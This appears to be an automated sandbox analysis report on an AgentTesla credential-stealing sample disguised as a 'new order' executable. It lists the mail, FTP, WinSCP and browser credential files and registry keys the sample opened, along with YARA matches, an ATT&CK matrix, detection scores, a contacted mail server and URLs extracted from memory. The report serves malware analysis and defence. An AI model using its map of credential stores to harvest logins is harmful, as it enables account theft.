                      Source: Yara matchFile source: Process Memory Space: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4252, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4792, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: Yara matchFile source: 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4792, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.3922928.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.38ecb08.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.38ecb08.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.3806288.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.517392444.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.284209429.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.284592595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4252, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4792, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection112Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery311Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe41%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\aUkURZiJ.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\aUkURZiJ.exe41%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.urwpp.demM0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/ys;0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/Y0y0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.fontbureau.comI.TTFks0%Avira URL Cloudsafe
                      http://www.fontbureau.comessed3sm0%Avira URL Cloudsafe
                      http://www.fontbureau.comessed0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.tiro.comD0%Avira URL Cloudsafe
                      http://www.urwpp.de.T0%Avira URL Cloudsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/ks0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/ch0%Avira URL Cloudsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.fontbureau.comttv0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/)0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.de0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://www.fontbureau.comtuta0%Avira URL Cloudsafe
                      http://www.fontbureau.com=0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/OsI0%Avira URL Cloudsafe
                      http://www.fontbureau.comsiva0%URL Reputationsafe
                      http://mail.kyowasecurity.com.sg0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.fontbureau.comF0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://KpGsSw.com0%Avira URL Cloudsafe
                      http://www.urwpp.deF0%URL Reputationsafe
                      http://www.fontbureau.comVsF0%Avira URL Cloudsafe
                      http://www.fontbureau.comzana0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.fontbureau.coma0%URL Reputationsafe
                      http://www.fontbureau.comd0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.founder.com.cn/cn/0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/ms0%Avira URL Cloudsafe
                      http://www.fontbureau.comcomF0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.fontbureau.comdrs0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/jp/OsI0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/a0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/VsF0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/3sm0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.kyowasecurity.com.sg
                      		113.197.35.43
                      		truetrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.urwpp.demMnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://127.0.0.1:HTTP/1.1new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.fontbureau.com/designersGnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bThenew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/ys;new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersWnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.261091046.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.261061221.0000000005699000.00000004.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/Y0ynew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.tiro.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248682275.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248549588.000000000569A000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.comI.TTFksnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.256055028.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designersnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255044284.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.261125302.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253788835.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253886398.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252653993.0000000005699000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comessed3smnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comessednew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.goodfont.co.krnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.tiro.comDnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248499503.0000000005699000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.urwpp.de.Tnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sajatypeworks.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cThenew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/ksnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.258256920.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257256254.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257951856.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257160579.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257050058.000000000569D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257213807.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257382975.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257294565.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257018883.0000000005699000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/chnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://fontfabrik.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comttvnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292765423.0000000005660000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.285795268.0000000005660000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp//new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250336903.000000000566D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleasenew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/)new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/frere-jones.html8new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.fonts.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleasenew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.denew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.sakkal.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
